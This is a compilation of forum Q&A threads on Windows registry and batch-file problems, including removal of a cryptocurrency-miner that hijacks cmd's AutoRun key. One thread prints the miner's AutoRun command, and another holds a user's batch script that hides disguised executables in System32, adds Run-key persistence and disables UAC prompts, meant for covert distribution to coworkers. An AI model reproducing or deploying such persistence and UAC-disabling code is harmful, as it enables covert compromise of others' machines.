For whatever reason, this:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\BeginSecond
/v begin-second /t REG_DWORD /f
/d "%HOMEDRIVE%\Documents and Settings\%USERNAME%\Desktop\bat script\begin-second"
Line feeds were added for readability, the command itself is one continuous line.
Produces the message "Invalid command-line parameters" when the program is run. The command before that adds the registry key "BeginSecond", so that's not the issue...
But, for some strange reason, this command worked perfectly fine before I booted up my Windows 2000 virtual machine today.
There is probably some super easy fix for this. Any help, please?
Related
I've noticed that my command line didn't start anymore, it just immediately minimized and closed itself upon running. I suspect this is due to a virus or at least some kind of malicious program having been executed. I found the following code inside my registry. It seems legible but my knowledge of batch / the command line is limited. Can anyone tell me what it does?
#mode 20,5 & tasklist /FI "IMAGENAME eq SoundModule.exe" 2>NUL | find /I /N "SoundModule.exe">NUL && exit & if exist "C:\Users\Leon\AppData\Roaming\Microsoft\SoundModule\SoundModule.exe" ( start /MIN "" "C:\Users\Leon\AppData\Roaming\Microsoft\SoundModule\SoundModule.exe" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit )
According to this reddit thread, it's a "vmprotected cryptocurrency miner".
You most likely got it if you installed anything you downloaded from the torrent network, for example a popular game released in the past few weeks :^)
The following SO thread contains part of the solution: CMD.exe closes immediately after calling (Win7 64)
The malicious party added an AutoRun directive via registry to the Windows Command Processor (cmd.exe usually), which you need to remove from any of the following locations it's present in:
Computer\HKEY_CURRENT_USER\Software\Microsoft\Command Processor
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
What the directive does is to execute SoundModule.exe and then explorer.exe (if not already started).
According to the other reply in this thread, they set %comspec% to run at startup, via Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.
So on startup, it's running %comspec% (instead of the default Windows Explorer), which itself on start first runs SoundModule.exe and then explorer.exe. Not sure why they did it this way, anyone who makes use of cmd.exe was bound to figure it out and spread the word.
There are at least two confirmed VirusTotal records for this file: [1], [2]
I had the same program on my computer, check Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon for the shell value which is most likely "%comspec%" (which makes sense why it was just cmd running on startup since %comspec% is cmd.exe) and change it to "explorer.exe"
Run regedit
Go to HKLM\Software\Microsoft\Command Processor\ or HKEY_CURRENT_USER\Software\Microsoft\Command Processor\ or HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\
For some reason there was AUTORUN key with "EXIT" inside.
Remove the AutoRun key and cmd will work fine.
Then check Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon for the shell value which is most likely "%comspec%" (which makes sense why it was just cmd running on startup since %comspec% is cmd.exe) and change it to "explorer.exe" as the user above said.
Edit: I also found that it was a cryptocurrency mining virus located at %appdata%\Microsoft\SoundModule or SoundMixer on my case.
You should probably delete this file too.
For reference, I will add that I was able to verify that my issue was the Autorun registry key by using Win-R to bring up the "Run" dialog, and typing cmd /d (which disables any autorun per the windows docs [https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cmd] . This successfully opened a command prompt window.
Inspecting the registry, my HKEY_CURRENT_USER\Software\Microsoft\Command Processor had Autorun as Type=REG_SZ and Data=if exist. I made a restore point, then renamed that key to AutorunOld ... and then I was able to open a command prompt without issue.
This issue is eating my brains of. I have a simple batch file which makes a directory in %SYSTEMROOT% only if it does not exist & copies certain files to that directory, adds the attribute +S +R +H to them, adds two programs to startup via registry and disables UAC as I need it frequently like 3x day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting than my code is not worth copying but my mates are also not the brightest bulbs!
My issue is that when I convert it to exe using Quick Batch Convertor as the moment it becomes an exe it starts giving Access denied error only when It gets to copy the files in %SYSTEMROOT% even though I am running it as administrator and the disabling UAC command, which is C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f works, which, originally should require admin privileges. Its only the the copying of files that give access denied when converted into exe. They all just work fine if it is in a form of batch.I know that this might be off topic but I suspect foul play on the batch file and not the Quick Batch Converter because I have converted many files using this converter an they worked flawless.
The code for my batch is here
#echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\" " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Antivirus-Update " /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\" " /f
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
exit
Any Suggestions?
Exact Duplicate of my question
See first you need to understand how a compiler works. Compiler may also be a horribly written or may be trojan. It is rare that a good compiler is made that works and is not marked as a trojan. I would recommend to start learning other languages such as C# or Python which have in-built exe convertor. So now as I said most exe Convertors can only run PURE DOS commands. Secondly There is a built in app that was modified In later versions of Windows known as UAC. From Windows 10 onwards not a single app without Perfect details that provides its Author and blah blah can be granted Full Administrator Rights until, you add an exception, by default. Then comes the 32 and 64 bit part. There are two versions of CMD from Windows 8 Onwards. One which is in C:\Windows\SYSWOWNode64 and one in C:\Windows\System32 So, If you have a 64 bit computer check for the folder in both locations. There are many more factors that play but I will wait until You Provide sufficient deatilas about what OS , 64 Bit or 32 bit computer you have and did you check in both locations so that it will narrow down my search
Regards
I've been working for some time on the installer for my application (using Installshield), and some time ago I came upon the problem, when batch file, that I called using LaunchApplication failed to execute (to be specific - it executed, but in the wrong directory). I decided to dig this issue up and stumbled upon this article. The problem, it turns out, lies within Autorun registry key, which is defined in following matter:
cd /d C:\Blahblah\Yadayada
So, before the batch file was actually executed, this command changed directory.
The batch file is most basic one, something like this:
:start
foo.exe %1 --bar %2 --baz %3
if errorlevel 1 goto fail
ECHO Success
goto end
fail:
ECHO Fail
:end
So, basically this batch file expects that it will be launched from the correct directory, and it's not. I'm append INSTALDIR variable to the batchname in LaunchApplication call, just to be clear, and it works perfectly fine when Autorun key is not set up.
And, well, I finally got to the question - is there any way to provide launch options for individual batch file? I know that providing /d option will render Autorun useless, but it only works only on direct call.
For instance, let's assume that I have batch file with simple 'dir' command (let's call it foo.bat), and my Autorun key is defined as shown above. I run command-prompt with /d option (CMD /d), and then run 'dir' directly I'll get content of the folder I'm currently in (e.g. user folder); BUT, if I launch foo.bat, I'll get contents of C:\Blahblah\Yadayada, because Autorun command will execute first, set default folder, and only after that 'dir' command will be called.
So, personally I see a few options here. First - removing Autorun key, and that would be the most fitting and easiest solution if it had to be applied only for one machine - I can't possibly expect every user to take care of their Autorun key for themselves. Second, which should be applicable for everyone (but which I hadn't tested yet), would be providing path to installation folder as extra parameter to batch file, and then changing directory to that:
:start
%4
cd %5
foo.exe %1 --bar %2 --baz %3
...
Where %4 would be a disk letter and %5 would be a path. This seems to be a solution, but I find it counterproductive that I have to implicitly change path to the folder, given that it works perfectly well when Autorun key is absent.
So, I was wondering if there's any workaround about this Autorun key problem. Maybe, like I've mentioned in the title, kind of /d option for batch file so that when it runs it will override global option from Autorun and will actually launch from the place it's supposed to launch, or some kind of technique like that? Also, maybe there's some kind of option in LaunchApplication() function I'm not aware of?
I'm helping one of my friends with his QA work. A lot of the time ctfmon.exe is always running in the background and he says it takes up memory on the computer for when he's testing. My friends work machine is using Windows XP
He already tried what was said in this article but it didn't help.
http://www.howtogeek.com/howto/windows-vista/what-is-ctfmonexe-and-why-is-it-running/
We then tried to create a simple batch file that would stop the process for him.
Here are the two files that we have
delete_cftmon.reg:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"=
Novoice.bat
taskkill /F /IM ctfmon.exe /T
regedit.exe /s delete_cftmon.reg
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run C:\WINDOWS\system32\ctfmon.exe
rem reg delete [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "ctfmon.exe"
I get the following errors "invalid command line parameters" and "Invalid key name"
When we enter the commands via the command line it works fine.
I believe it has to do with HKEY_CURRENT_USER but I'm not entirely sure why.
Any help would be greatly appreciated.
I have a batch file that uses this idiom (many times) to read a registry value into an environment variable:
FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLM\SOFTWARE\Path\To\Key" /v ValueName') DO SET MyVariable=%%B
(There's a tab character after delims=)
This works fine on thousands of customer's computers. But on one customer's computer (running Windows Server 2003, command extensions enabled),
it fails with 'REG QUERY "HKLM\SOFTWARE\Path\To\Key" /v ValueName' is not recognized as an internal or external command, operable program or batch file.' Running the "reg query" command alone works fine. Reg.exe is present in C:\Windows\System32.
I was able to work around the problem by changing the code to
REG QUERY "HKLM\SOFTWARE\Path\To\Key" /v ValueName > temp.txt
FOR /F "tokens=2* delims= " %%A IN (temp.txt) DO SET MyVariable=%%B
This got the customer up and running, but I would like to understand why the problem occurred so I can avoid it in the future.
Slightly off the primary topic - a more direct way to get a registry value (string or DWORD) into an environment variable would also be useful.
I would check:
The customer's role on the machine - are they an admin?
Where is reg.exe on the box - is there more than one copy of copy of reg.exe in the path?
Is there any locale difference on the customer's machine from the machines where this normally works?
Basically, enumerate everything that differs between this machine and machines where it works as expected. Include service packs, domain membership, etc.
Wow, that is odd.
If the same commands work when split into two lines, then I'd guess it has something to do with the way the command gets run in a subshell in the FOR command.
If you were really dying to figure out why it's dying in this particular case, you could run commands like "SET > envvars.txt" as the FOR command and compare that with the top shell.
Or maybe start off simple and try running the REG command via CMD /C to see if that does anything?
One quick guess here, what's the values of COMSPEC and SHELL ?
I had a similar situation to this. In my case it was a bad value in COMSPEC. I fixed that and the script started working as expected.
The /F switch needs command extensions to be turned on. Usually they are turned on by default, but I'd check that. On XP systems you can turn them on doing something like
cmd /e:on
or checking the registry under
HKCU\Software\Microsoft\Command Processor\EnableExtensions
Dunno about Windows Server.
Doing help for and help cmd could provide some hints as well.